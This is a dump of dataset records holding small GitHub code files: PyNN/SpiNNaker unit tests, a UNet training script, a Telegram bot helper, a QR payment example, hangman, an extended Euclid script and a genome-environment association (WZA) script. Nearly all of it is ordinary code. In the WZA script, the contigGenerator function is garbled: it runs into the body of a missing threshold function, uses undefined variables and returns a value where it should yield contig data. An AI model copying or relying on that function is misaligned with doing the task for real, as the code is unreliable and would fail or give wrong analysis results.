args\n","repo_name":"LING-575-Summarization/Summarization","sub_path":"src/preprocess/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30073000845","text":"n = int(input(\"n :\"))\narr = [2,3,6,6,5]\n\narr.sort()\nmax = -100\nfor i in arr:\n if i>max:\n max = i\nm = arr.count(max)\n\nprint(arr[n-m-1])","repo_name":"i-bilge/HackerRank","sub_path":"Runer-Up.py","file_name":"Runer-Up.py","file_ext":"py","file_size_in_byte":144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6344804058","text":"import numpy\nimport pytest\nimport pyNN.spiNNaker as sim\nfrom spinnaker_testbase import BaseTestCase\n\nN_NEURONS = 4\nLABEL = \"pop_1\"\n\n\nclass TestIDMixin(BaseTestCase):\n\n # NO unittest_setup() as sim.setup is called\n\n def test_cells(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n assert 0 == cells[0].id\n assert len(str(cells[0])) > 0\n assert len(repr(cells[0])) > 0\n assert not cells[1].__eq__(\"Not the same object\")\n sim.end()\n\n def test_get_set(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n p_tau_m = pop_1.get(\"tau_m\")\n tau_m_3 = cells[3].tau_m\n assert p_tau_m[3] == tau_m_3\n cells[2].tau_m = 2\n p_tau_m = pop_1.get(\"tau_m\")\n assert 2 == p_tau_m[2]\n params = cells[1].get_parameters()\n p_i_offset = pop_1.get(\"i_offset\")\n assert params[\"i_offset\"] == p_i_offset[1]\n cells[2].set_parameters(tau_m=3, i_offset=13)\n params = cells[2].get_parameters()\n assert 13 == params[\"i_offset\"]\n sim.end()\n\n def test_bad(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(4, sim.IF_curr_exp(), label=LABEL)\n cell = pop_1.all_cells[2]\n with pytest.raises(Exception):\n cell.variable_that_is_not_there\n with pytest.raises(Exception):\n cell.variable_that_is_not_there = \"pop\"\n sim.end()\n\n def test_is_local(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n assert pop_1.is_local(2) == cells[2].local\n sim.end()\n\n \"\"\"\n def test_positions(self):\n grid_structure = sim.Grid2D(dx=1.0, dy=1.0, x0=0.0, y0=0.0)\n positions = grid_structure.generate_positions(4)\n pos_T = positions.T\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n assert \"q\" == pop_1.position[1]\n \"\"\"\n\n def test_init_by_in(self):\n sim.setup(timestep=1.0)\n pop = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n assert [-65.0, -65.0, -65.0, -65.0] == pop.initial_values[\"v\"]\n cells = pop.all_cells\n cells[1].set_initial_value(variable=\"v\", value=-60)\n assert -60 == cells[1].get_initial_value(\"v\")\n cells[2].initialize(v=-59)\n assert -59 == cells[2].initial_values[\"v\"]\n assert [-65.0, -60.0, -59.0, -65.0] == pop.initial_values[\"v\"]\n sim.end()\n\n def test_initial_values(self):\n sim.setup(timestep=1.0)\n pop = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop.all_cells\n assert -65 == cells[1].get_initial_value(\"v\")\n cells[1].set_initial_value(\"v\", -60)\n assert [-65.0, -60.0, -65.0, -65.0] == pop.initial_values[\"v\"]\n sim.end()\n\n def test_asview(self):\n sim.setup(timestep=1.0)\n pop = sim.Population(4, sim.IF_curr_exp(), label=LABEL)\n cell = 
pop[2]\n cell.as_view()\n\n def test_ssa_spike_times(self):\n n_atoms = 10\n set_id = 1\n set_value = [5]\n sim.setup(timestep=1.0)\n pop = sim.Population(n_atoms, sim.SpikeSourceArray([]))\n pop[set_id].set_parameters(spike_times=set_value)\n result = pop.get(\"spike_times\")\n result_should_be = []\n for atom in range(n_atoms):\n if atom == set_id:\n result_should_be.append(numpy.array(set_value))\n else:\n result_should_be.append([])\n self.assertEqual(result, result_should_be)\n","repo_name":"SpiNNakerManchester/sPyNNaker","sub_path":"unittests/test_pop_views_assembly/test_idmixin.py","file_name":"test_idmixin.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"31"} +{"seq_id":"36703963828","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nfrom tqdm import tqdm\n\nfrom train_fxns import *\nimport segmentation_models_pytorch as smp\nfrom segmentation_models_pytorch import Unet\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader, random_split\n\nimport datetime\n\ndir_checkpoint = None\n\n\ndef train_net(\n net,\n device,\n epochs=5,\n batch_size=1,\n lr=0.001,\n val_percent=0.1,\n save_cp=True,\n img_scale=0.5,\n):\n\n dataset = BasicDataset(dir_img, dir_mask, img_scale) # Preprocess dataset\n n_val = int(len(dataset) * val_percent)\n n_train = len(dataset) - n_val\n train, val = random_split(dataset, [n_train, n_val]) # Train/validation split\n # Pytorch data loader. Try setting num_workers to run two scripts in parallel\n train_loader = DataLoader(\n train, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True\n )\n val_loader = DataLoader(\n val,\n batch_size=batch_size,\n shuffle=False,\n num_workers=0,\n pin_memory=True,\n drop_last=True,\n )\n\n writer = SummaryWriter(\n log_dir=dir_checkpoint, comment=f\"LR_{lr}_BS_{batch_size}_SCALE_{img_scale}\"\n )\n global_step = 0\n\n logging.info(\n f\"\"\"Starting training:\n Epochs: {epochs}\n Batch size: {batch_size}\n Learning rate: {lr}\n Training size: {n_train}\n Validation size: {n_val}\n Checkpoints: {save_cp}\n Device: {device.type}\n Images scaling: {img_scale}\n \"\"\"\n )\n\n # Essentially gradient decent with momentum (adaptive learning rate)\n optimizer = optim.RMSprop(net.parameters(), lr=lr, weight_decay=1e-8, momentum=0.9)\n # Dynamic learning rate based on validation\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, \"min\" if classes > 1 else \"max\", patience=10\n )\n if classes > 1:\n criterion = nn.CrossEntropyLoss()\n else:\n criterion = nn.BCEWithLogitsLoss()\n\n for epoch in range(epochs): # Training loop\n net.train()\n\n epoch_loss = 0\n with tqdm(\n total=n_train, desc=f\"Epoch {epoch + 1}/{epochs}\", unit=\"img\"\n ) as pbar: # Shows progress of scepific functions in trining loop\n for batch in train_loader: # Loop through batch size\n imgs = batch[\"image\"]\n true_masks = batch[\"mask\"]\n assert imgs.shape[1] == in_channels, (\n f\"Network has been defined with {in_channels} input channels, \"\n f\"but loaded images have {imgs.shape[1]} channels. 
Please check that \"\n \"the images are loaded correctly.\"\n )\n\n imgs = imgs.to(\n device=device, dtype=torch.float32\n ) # Load the images to the specified device\n mask_type = torch.float32 if classes == 1 else torch.long\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n masks_pred = net(imgs) # Pass the images through the specified CNN\n loss = criterion(\n masks_pred, true_masks\n ) # Loss after passing through CNN\n epoch_loss += loss.item()\n writer.add_scalar(\n \"Loss/train\", loss.item(), global_step\n ) # Adding loss values to log\n\n pbar.set_postfix(**{\"loss (batch)\": loss.item()})\n\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_value_(net.parameters(), 0.1)\n optimizer.step()\n\n pbar.update(imgs.shape[0])\n global_step += 1\n if global_step % (n_train // (10 * batch_size)) == 0:\n for tag, value in net.named_parameters():\n tag = tag.replace(\".\", \"/\")\n writer.add_histogram(\n \"weights/\" + tag, value.data.cpu().numpy(), global_step\n )\n writer.add_histogram(\n \"grads/\" + tag, value.grad.data.cpu().numpy(), global_step\n )\n val_score = eval_net(net, val_loader, device)\n scheduler.step(val_score)\n writer.add_scalar(\n \"learning_rate\", optimizer.param_groups[0][\"lr\"], global_step\n )\n\n if classes > 1:\n logging.info(\"Validation cross entropy: {}\".format(val_score))\n writer.add_scalar(\"Loss/test\", val_score, global_step)\n else:\n logging.info(\"Validation Dice Coeff: {}\".format(val_score))\n writer.add_scalar(\"Dice/test\", val_score, global_step)\n\n writer.add_images(\"images\", imgs, global_step)\n if classes == 1:\n writer.add_images(\"masks/true\", true_masks, global_step)\n writer.add_images(\n \"masks/pred\", torch.sigmoid(masks_pred) > 0.5, global_step\n )\n\n if save_cp:\n if epoch % 5 == 0: # Saving model every 5 epochs\n try:\n os.mkdir(dir_checkpoint)\n logging.info(\"Created checkpoint directory\")\n except OSError:\n pass\n torch.save(\n net.state_dict(), dir_checkpoint + f\"CP_epoch{epoch + 1}.pth\"\n )\n logging.info(f\"Checkpoint {epoch + 1} saved !\")\n\n writer.close()\n\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"Train the UNet on images and target masks\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"-e\",\n \"--epochs\",\n metavar=\"E\",\n type=int,\n default=5,\n help=\"Number of epochs\",\n dest=\"epochs\",\n )\n parser.add_argument(\n \"-b\",\n \"--batch-size\",\n metavar=\"B\",\n type=int,\n nargs=\"?\",\n default=1,\n help=\"Batch size\",\n dest=\"batchsize\",\n )\n parser.add_argument(\n \"-l\",\n \"--learning-rate\",\n metavar=\"LR\",\n type=float,\n nargs=\"?\",\n default=0.0001,\n help=\"Learning rate\",\n dest=\"lr\",\n )\n parser.add_argument(\n \"-f\",\n \"--load\",\n dest=\"load\",\n type=str,\n default=False,\n help=\"Load model from a .pth file\",\n )\n parser.add_argument(\n \"-s\",\n \"--scale\",\n dest=\"scale\",\n type=float,\n default=0.5,\n help=\"Downscaling factor of the images\",\n )\n parser.add_argument(\n \"-v\",\n \"--validation\",\n dest=\"val\",\n type=float,\n default=10.0,\n help=\"Percent of the data that is used as validation (0-100)\",\n )\n parser.add_argument(\n \"-c\", \"--classes\", type=int, help=\"Model output channels\", default=1\n )\n parser.add_argument(\n \"-ic\", \"--in-channels\", type=int, help=\"Model input channels\", default=1\n )\n parser.add_argument(\n \"-d\", \"--device\", type=str, help=\"Select device\", default=\"cuda:0\"\n )\n parser.add_argument(\n \"-cp\",\n 
\"--checkpoint\",\n type=str,\n help=\"Name folder for checkpoints\",\n default=\"checkpoints/\",\n )\n parser.add_argument(\n \"-fn\", \"--file\", type=str, help=\"Name folder for images\", default=None\n )\n parser.add_argument(\n \"-mf\", \"--mask-folder\", type=str, help=\"Name for folder for mask\", default=None\n )\n parser.add_argument(\n \"-en\", \"--encoder\", type=str, help=\"Name of encoder\", default=\"resnet34\"\n )\n parser.add_argument(\n \"-wt\", \"--weight\", type=str, help=\"Encoder weights\", default=None\n )\n parser.add_argument(\"-a\", \"--architecture\", type=str, help=\"Name of architecture\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.INFO, format=\"%(levelname)s: %(message)s\"\n ) # Initiate logging of metrics\n args = get_args() # Function to call arguments from argparse\n device = torch.device(\n args.device if torch.cuda.is_available() else \"cpu\"\n ) # Define the device\n # device = torch.device('cuda:1') # add argparser for this\n logging.info(f\"Using device {device}\")\n dir_checkpoint = args.checkpoint\n dir_img = args.file\n dir_mask = args.mask_folder\n\n # Change here to adapt to your data\n # in_channels=3 for RGB images\n # classes is the number of probabilities you want to get per pixel\n # - For 1 class and background, use classes=1\n # - For 2 classes, use classes=1\n # - For N > 2 classes, use classes=N\n in_channels = args.in_channels\n classes = args.classes\n encoder = args.encoder\n weight = args.weight\n architecture = args.architecture\n # net = smp.Unet(encoder_name=encoder, in_channels=in_channels, classes=classes, encoder_weights=weight)\n\n def arch_arg(architecture):\n if architecture.lower() == \"unet\":\n net = smp.Unet(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"unetplusplus\":\n net = smp.UnetPlusPlus(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"manet\":\n net = smp.MAnet(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"linknet\":\n net = smp.Linknet(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"fpn\":\n net = smp.FPN(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n else:\n print(\"Architecture not recognized.\")\n quit()\n\n return net\n\n net = arch_arg(architecture)\n\n logging.info(\n f\"Network:\\n\"\n f\"\\t{in_channels} input channels\\n\"\n f\"\\t{classes} output channels (classes)\\n\"\n )\n\n if args.load:\n net.load_state_dict(torch.load(args.load, map_location=device))\n logging.info(f\"Model loaded from {args.load}\")\n\n net.to(device=device)\n # faster convolutions, but more memory\n # cudnn.benchmark = True\n\n try:\n train_net(\n net=net,\n epochs=args.epochs,\n batch_size=args.batchsize,\n lr=args.lr,\n device=device,\n img_scale=args.scale,\n val_percent=args.val / 100,\n )\n except KeyboardInterrupt:\n torch.save(net.state_dict(), \"INTERRUPTED.pth\")\n logging.info(\"Saved interrupt\")\n try:\n sys.exit(0)\n except SystemExit:\n 
os._exit(0)\n","repo_name":"nathanBurg/Time-Lapse-Microscopy-Toolkit","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6750547606","text":"import time\n\ndef answer():\n    start = time.time()\n    choice = input(\"enter your choice: \")\n    elapsed = round(time.time() - start)\n    if elapsed <= 7:\n        print('safe')\n    else:\n        print('died')\n    return choice\n\n# answer() previously stored the choice in a local variable, so the module-level\n# comparison below always saw a placeholder value; returning the choice fixes that.\noption = answer()\n\nif option <= '5':\n    print('story')\nelse:\n    print('no story')\n","repo_name":"Himakar5110/Mini_projects","sub_path":"Include_timing_in_quiz.py","file_name":"Include_timing_in_quiz.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10727588950","text":"import upnqr\n\ndata = upnqr.Data(\n    placnik = upnqr.Placnik(\n        ime='Ime Plačnika',\n        ulica='Plačnikova ulica 1',\n        kraj='Kraj Plačnika'),\n    prejemnik = upnqr.Prejemnik(\n        ime='Ime Prejemnika',\n        ulica='Prejemnikova ulica 1',\n        kraj='Kraj Prejemnika',\n        iban='SI56043020002997963'),\n    znesek = 42.00,\n    koda_namena = 'COST',\n    namen_placila = 'Namen plačila',\n    rok_placila = '2022-05-01',\n    referenca = 'SI1212345678909'\n)\n\nqr = upnqr.make_from_data(data)\nupnqr.to_pil(qr).save('out.png')\n\n#print(upnqr.to_text(qr, border=4))\n","repo_name":"shrx/upnqr","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9033983690","text":"import json\nimport requests\nimport urllib.parse  # plain \"import urllib\" does not reliably expose the parse submodule\n\n\ntext = open(\"api.txt\", \"r\")\nTOKEN = text.readlines()[1].split(\"=\")[1].strip()\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\ntext.close()\n\n\ndef get_url(url):\n    response = requests.get(url)\n    content = response.content.decode(\"utf8\")\n    return content\n\n\ndef get_json_from_url(url):\n    content = get_url(url)\n    js = json.loads(content)\n    return js\n\n\ndef get_updates(offset=None):\n    url = URL + \"getUpdates?timeout=100\"\n    if offset:\n        url += \"&offset={}\".format(offset)\n    js = get_json_from_url(url)\n    return js\n\n\ndef get_last_chat_id_and_text(updates):\n    num_updates = len(updates[\"result\"])\n    last_update = num_updates - 1\n    text = updates[\"result\"][last_update][\"message\"][\"text\"]\n    chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n    return text, chat_id\n\n\ndef send_message(text, chat_id, reply_markup=None):\n    text = urllib.parse.quote_plus(text)\n    url = URL + \"sendMessage?text={}&chat_id={}&parse_mode=Markdown\".format(text, chat_id)\n    if reply_markup:\n        url += \"&reply_markup={}\".format(reply_markup)\n    get_url(url)\n\n\ndef get_last_update_id(updates):\n    update_ids = []\n    for update in updates[\"result\"]:\n        update_ids.append(int(update[\"update_id\"]))\n    return max(update_ids)\n\n\ndef echo_all(updates):\n    for update in updates[\"result\"]:\n        try:\n            text = update[\"message\"][\"text\"]\n            chat = update[\"message\"][\"chat\"][\"id\"]\n            send_message(text, chat)\n        except Exception as e:\n            print(e)\n","repo_name":"madkingaerys/telegram-chatbot","sub_path":"api_methods.py","file_name":"api_methods.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3107004473","text":"a = int(input(\"Please Enter positive number a: \")) \r\nb = int(input(\"Please Enter 
positive number b (a>b): \")) \r\n\r\n\r\ndef ObobshchennyjAlgorithmEvlkida(a, b):\r\n    u = [a, 1, 0]\r\n    v = [b, 0, 1]\r\n    while v[0] != 0:\r\n        q = u[0] // v[0]\r\n        t = [u[0] % v[0], u[1] - q * v[1], u[2] - q * v[2]]\r\n        u = v\r\n        v = t\r\n    return u\r\n\r\n\r\n
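# Sanity check (illustrative): the returned triple [g, x, y] satisfies g == a*x + b*y.\r\n# For example, ObobshchennyjAlgorithmEvlkida(240, 46) returns [2, -9, 47],\r\n# and 240*(-9) + 46*47 == 2.\r\n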
result = ObobshchennyjAlgorithmEvlkida(a, b)\r\ngcdAB = result[0]\r\nx = result[1]\r\ny = result[2]\r\nprint(\"The greatest common divisor of a and b: \" + str(gcdAB))\r\nprint(\"Found value x: \" + str(x))\r\nprint(\"Found value y: \" + str(y))\r\ninput('Press \"Enter\" to close the program')\r\n\r\n","repo_name":"Gambitos/ctf-criptom","sub_path":"Generalized Euclid algorithm.py","file_name":"Generalized Euclid algorithm.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2467995060","text":"\ndef is_acceptable(data: str) -> bool:\n    acceptable_conditions = (\n        len(data.split(\" \")) <= 50,\n        len(data) > 1,\n        len(data) <= 1000,\n        data != \"[deleted]\",\n        data != \"[removed]\",\n    )\n    return all(acceptable_conditions)\n\n\nasync def sql_insert(\n    parent_id: str,\n    comment_id: str,\n    comment: str,\n    subreddit: str,\n    time_utc: int,\n    score: int,\n) -> tuple:\n    sql = \"\"\"\n    INSERT INTO \n    parent_reply (\n        parent_id, \n        comment_id,\n        comment\n    ) \n    VALUES (?, ?, ?)\"\"\"\n\n    return sql, (parent_id, comment_id, comment)\n\n\nasync def persist_transactions(db, sql_transactions):\n    await db.execute(\"BEGIN TRANSACTION\")\n    for s, p in sql_transactions:\n        try:\n            await db.execute(s, p)\n        except Exception as e:\n            print(s, p, e)\n    await db.commit()\n    print(f\"{len(sql_transactions)} rows affected.\")","repo_name":"pythrick/chat-bot","sub_path":"chatbot/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33018341028","text":"# pylint: disable=missing-module-docstring\nimport random\nimport string\nfrom words_file import words\n\n\ndef get_valid_word(words_list):\n    \"This function chooses a random, valid word from a list of words\"\n    # valid word -> free from spaces and hyphens (-)\n\n    random_word = random.choice(words_list)\n    while ' ' in random_word or '-' in random_word :\n        random_word = random.choice(words_list)\n\n    return random_word\n\ndef hangman():\n    \"This function implements the hangman game\"\n\n    guess_word = get_valid_word(words)\n\n    print(guess_word)\n\n    guess_letter = set(guess_word) # turn the word into a set of its letters\n    alphabet = set(string.ascii_lowercase)\n    used_letters = set() # To track which letters the user has chosen / guessed\n\n    lives = 6\n\n    while len(guess_letter) > 0 and lives > 0:\n        print('You have used these letters : ', ' '.join(used_letters))\n        current_guess = [letter if letter in used_letters else '-' for letter in guess_word ]\n        print(\"Current word :\", ' '.join(current_guess))\n\n        user_letter = input(f'You have {lives} lives left. Guess a letter: ').lower()\n\n        if user_letter in alphabet - used_letters:\n            used_letters.add(user_letter)\n            if user_letter in guess_letter:\n                guess_letter.remove(user_letter)\n            else:\n                lives = lives - 1\n                print(f\"{user_letter} not in the word.\")\n\n        elif user_letter in used_letters:\n            print(f'You have already guessed this letter {user_letter}. Try again.')\n\n        else:\n            print(\"Invalid character ! Try again.\")\n\n    if len(guess_letter) > 0:\n        print(f'You lost: the word was {guess_word.upper()}')\n    else:\n        print(f'You nailed it! You guessed the word: {guess_word.upper()}')\n\n\nhangman()\n","repo_name":"brunoCo-de/hangman-game","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70653920088","text":"import xadmin\nfrom main import models\n\n# Customize the xadmin theme\nfrom xadmin import views\nclass GlobalSettings(object):\n    \"\"\"Global configuration for xadmin\"\"\"\n    site_title = \"Harbin Medical University website admin\"  # set the site title\n    site_footer = \"Harbin Medical University\"  # set the site footer\n    menu_style = \"accordion\"  # collapse the menu (accordion style)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n# Register your models here.\nxadmin.site.register(models.NoncoRNA)\nxadmin.site.register(models.Submit)\n","repo_name":"foreversun52/ncdtc","sub_path":"main/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28291174522","text":"import pandas as pd\nimport scipy.stats\nimport numpy as np\nimport sys, glob, argparse\nfrom GEA_functions import *\n\n## Here's a script to calculate the Weighted Z score (and the top-candidate test from the AdapTree data structures - i.e. those that are present in the Dryad repository)\n\nclass corLine:\n\n\tdef __init__(self, c, envIndex):\n\n\t\tdat = c.strip().split()\n\n\t\tself.contig = dat[6]\n\n\t\tself.pos = int(dat[7])\n\n## The data in the Correlations file are stored as contig-pos, so I'll parse that out\n## Note that this is VERY sensitive to the file structure staying the same\n\t\tif dat[envIndex] == \"NA\":\n\t\t\t\tself.pVal = \"NA\"\n\t\telse:\n\t\t\t\tself.pVal = float(dat[envIndex])\n\n\t\tMAF = 1 - float(dat[13])\n\n\t\tself.pbar_qbar = MAF * (1 - MAF)\n\n## A generator function to spit out the consecutive lines for the contig\ndef contigGenerator(correlationFile, envFilter):\n\n\tcurrent_contig = \"\"\n\n\tcontig_data = []\n\n\twith open( 
corData ) as cor:\n\t\tfor c in cor:\n\t\t\tif c.startswith(\"X.annotation\") or c.startswith(\"X_annotation\"):continue\n\t\t\tcurrentLine = corLine(c, targetEnv)\n\t\t\tif currentLine.pVal == \"NA\": continue\n\t\t\tpValues.append(currentLine.pVal)\n\tif len(pValues) == 0:\n\t\treturn None\n\telse:\n\t\treturn( 1 -np.percentile( 1 - np.array(pValues), percentile_threshold ) )\n\n\ndef main():\n\n## Define command line args\n\n\tparser = argparse.ArgumentParser(description=\"\")\n\n\tparser.add_argument(\"--correlations\", \"-c\",\n\n\t\t\trequired = True,\n\n\t\t\tdest = \"correlations\",\n\n\t\t\ttype = str,\n\n\t\t\thelp = \"The file containing the correlations\")\n\n\tparser.add_argument(\"--output\",\n\n\t\t\trequired = True,\n\n\t\t\tdest = \"output\",\n\n\t\t\ttype = str,\n\n\t\t\thelp = \"The name of the output file (the environment will be prepended to the file name so be sure to write to this dir!)\")\n\n\tparser.add_argument(\"--env\",\n\n\t\t\trequired = False,\n\n\t\t\tdest = \"env\",\n\n\t\t\ttype = str,\n\n\t\t\thelp = \"If you want to analyse just a single environment, give it here [DD_0]\",\n\n\t\t\tdefault = \"DD_0\")\n\n\tparser.add_argument(\"--empirical_p\",\n\n\t\t\trequired = False,\n\n\t\t\tdest = \"empirical_p\",\n\n\t\t\taction = \"store_true\",\n\n\t\t\thelp = \"[OPTIONAL] Give this flag if you want to analyse empirical p-values that have been appended to the dataframe\")\n\n\tparser.add_argument(\"--bay\",\n\n\t\t\trequired = False,\n\n\t\t\tdest = \"bay\",\n\n\t\t\taction = \"store_true\",\n\n\t\t\thelp = \"[OPTIONAL] Give this flag if the analysis files are BayesFactors from bayEnv.\")\n\n\targs = parser.parse_args()\n\n## For all environmental variables:\n## MAT MWMT MCMT TD MAP MSP AHM SHM DD_0 DDS NFFD bFFP FFP PAS EMT EXT Eref CMD\n\n\tadapTreeEnvs = [\"LAT\"\t,\"LONG\"\t,\"ELEVATION\"\t,\"MAT\"\t,\"MWMT\"\t,\"MCMT\"\t,\"TD\"\t,\"MAP\"\t,\"MSP\"\t,\"AHM\"\t,\"SHM\"\t,\"DD_0\"\t,\"DD5\"\t,\"NFFD\"\t,\"bFFP\"\t,\"eFFP\"\t,\"FFP\"\t,\"PAS\"\t,\"EMT\"\t,\"EXT\"\t,\"Eref\"\t,\"CMD\"\t,\"Budset_p\"\t,\"Budbreak_p\"\t,\"Height_season_1_p\"\t,\"Height_season_2_p\"\t,\"Diameter_p\"\t,\"Shoot_weight_p\"\t,\"Root_weight_p\"\t,\"Max_growth_rate_p\"\t,\"Linear_growth_days_p\"\t,\"X5_growth_complete_days_p\"\t,\"X95_growth_complete_days_p\"\t,\"X5_95_growth_days_p\"\t,\"Fall_cold_injury_p\"\t,\"Winter_cold_injury_p\"\t,\"Spring_cold_injury_p\"\t,\"root_wt_shoot_wt_p\"\t,\"root_wt_shoot_wt_p_1\"]\n\n\tadapTreeEnvDict = {}\n\n\tfor i in range(len(adapTreeEnvs)):\n\t\tadapTreeEnvDict[adapTreeEnvs[i]] = i + 32 ## to adjust for the length of the adaptree SNP table files\n\n## If you specify just a single environment (which is recommended for parallelisation)\n\tif args.env:\n## Make sure that the environment specified is actually valid\n\t\tif args.env not in adapTreeEnvs:\n\t\t\tprint(\"you did not specify a valid environment. Take a look at your command, bozo\")\n\t\t\treturn\n\t\tenvs = [args.env]\n\n## We're going to analyse each env. 
separately\n\tfor env in envs:\n## If you've made the file of empirical ps, only analyse the last column\n\t\tif args.empirical_p:\n\t\t\tenvIndex = -1\n\t\telse:\n\t\t\tenvIndex = adapTreeEnvDict[env]\n\t\tall_contigs = []\n\n## Now let's calculate the outlier threshold (for the TC test) from the data - Make sure it's a percentile!\n\t\tthreshold_99th = correlationThreshold( args.correlations, envIndex, percentile_threshold = 99)\n\n\t\tif threshold_99th is None:\n\t\t\tprint(\"Something went wrong when identifying the outlier threshold\")\n\t\t\treturn\n\t\tprint(\"99th percentile:\",threshold_99th)\n\n\n\t\tprint(\"Analysing:\",env)\n\n\t\tcount = 0\n\n## Iterate over contigs spat out by the contig generator\n\t\tfor contig,SNPs in contigGenerator(args.correlations, envIndex):\n\t\t\tcount += 1\n#\t\t\tif count ==100: break\n\n## Grab all the genes present on this contig\n\t\t\tcontigDF = contigSnpTable(SNPs)\n\n\t\t\tprint(contig, count)\n\n\n# Remove all NAs from the SNP set\n\t\t\tcontigDF = contigDF[contigDF[\"pVal\"]!=\"NA\"]\n## If there are no annotations on the current contig, move to the next\n\t\t\tif contigDF.shape == (0,0):\n\t\t\t\tcontinue\n\t\t\tif contigDF.shape[0] <5: continue\n## Get the average position of each annotation - not used for the analysis, just for downstream plotting\n\n\t\t\tposition = contigDF.groupby([\"gene\"])[\"pos\"].mean().to_frame()\n\n\n## Perform the WZA on the annotations in the contig\n\t\t\twza = WZA(contigDF, \"pVal\")\n## Perform the top-candidate test for the annotations in the contig\n\t\t\tTopCan = top_candidate( contigDF, threshold_99th, 0.01, \"pVal\", 0.9999, MAF_filter = 0.05 )\n## Combine the results\n\t\t\tresult = pd.concat([ position, wza, TopCan] , axis = 1, sort = True ).reset_index()\n\n\t\t\tresult[\"contig\"] = contig\n\n\t\t\tresult[\"env\"] = env\n\n\t\t\tall_contigs.append( result )\n\n\t\t\tif count%1000 == 0:\n\t\t\t\tprint( count,\"contigs analysed\")\n\n\n\t\tif len( all_contigs ) == 0: continue\n\n## Combine all contig-specific dataframes into a single big one\n\t\toutputDF = pd.concat(all_contigs)\n\n## Get the expected proportion of hits per hit-bearing gene\n\t\texpected = outputDF[outputDF[\"hits\"]!=0][\"hits\"].sum() / outputDF[outputDF[\"hits\"]!=0][\"SNPs\"].sum()\n\n\t\tprint(\"expected proportion\", expected)\n\t\ttop_candidate_p = [ scipy.stats.binom_test(h, s, expected, alternative = \"greater\" ) for h, s in zip(outputDF.hits, outputDF.SNPs)]\n\n\t\toutputDF[\"top_candidate_p\"] = top_candidate_p\n#\t\toutputDF[\"top_candidate_p\"] = scipy.stats.binom_test(outputDF.hits, outputDF.SNPs, expected, alternative = \"greater\" )\n\t\texpected_hits = [ scipy.stats.binom.ppf( 0.9999 , s, expected ) for s in outputDF.SNPs]\n\n\t\toutputDF[\"expected_hits\"] = scipy.stats.binom.ppf( 0.9999 , outputDF.SNPs, expected )\n\n## Calculate the top-candidate index\n#\t\toutputDF = pd.concat(all_contigs)\n\n\n## Write the dataframe to an output file\n\t\toutputDF.to_csv(env + \"_\" + args.output,index = False)\n\n\nmain()\n","repo_name":"CoAdapTree/WZA","sub_path":"dataAnalysis/bin/WZA_AdapTree.py","file_name":"WZA_AdapTree.py","file_ext":"py","file_size_in_byte":7730,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"75087511766","text":"from 